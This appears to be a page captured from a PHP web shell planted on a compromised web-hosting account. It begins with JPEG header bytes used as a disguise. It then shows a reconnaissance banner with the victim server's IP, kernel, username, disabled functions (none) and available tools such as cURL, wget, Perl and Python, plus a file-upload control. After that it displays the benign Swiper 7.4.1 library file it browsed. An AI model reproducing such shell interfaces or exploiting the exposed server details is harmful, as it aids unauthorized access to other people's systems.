ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.74 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/14/lib/node_modules/swiper/ |
Upload File : |
/** * Swiper 7.4.1 * Most modern mobile touch slider and framework with hardware accelerated transitions * https://swiperjs.com * * Copyright 2014-2021 Vladimir Kharlampidi * * Released under the MIT License * * Released on: December 24, 2021 */ import Swiper from './core/core.js'; export { default as Swiper, default } from './core/core.js'; import Virtual from './modules/virtual/virtual.js'; import Keyboard from './modules/keyboard/keyboard.js'; import Mousewheel from './modules/mousewheel/mousewheel.js'; import Navigation from './modules/navigation/navigation.js'; import Pagination from './modules/pagination/pagination.js'; import Scrollbar from './modules/scrollbar/scrollbar.js'; import Parallax from './modules/parallax/parallax.js'; import Zoom from './modules/zoom/zoom.js'; import Lazy from './modules/lazy/lazy.js'; import Controller from './modules/controller/controller.js'; import A11y from './modules/a11y/a11y.js'; import History from './modules/history/history.js'; import HashNavigation from './modules/hash-navigation/hash-navigation.js'; import Autoplay from './modules/autoplay/autoplay.js'; import Thumbs from './modules/thumbs/thumbs.js'; import FreeMode from './modules/free-mode/free-mode.js'; import Grid from './modules/grid/grid.js'; import Manipulation from './modules/manipulation/manipulation.js'; import EffectFade from './modules/effect-fade/effect-fade.js'; import EffectCube from './modules/effect-cube/effect-cube.js'; import EffectFlip from './modules/effect-flip/effect-flip.js'; import EffectCoverflow from './modules/effect-coverflow/effect-coverflow.js'; import EffectCreative from './modules/effect-creative/effect-creative.js'; import EffectCards from './modules/effect-cards/effect-cards.js'; // Swiper Class const modules = [Virtual, Keyboard, Mousewheel, Navigation, Pagination, Scrollbar, Parallax, Zoom, Lazy, Controller, A11y, History, HashNavigation, Autoplay, Thumbs, FreeMode, Grid, Manipulation, EffectFade, EffectCube, EffectFlip, EffectCoverflow, EffectCreative, EffectCards]; Swiper.use(modules);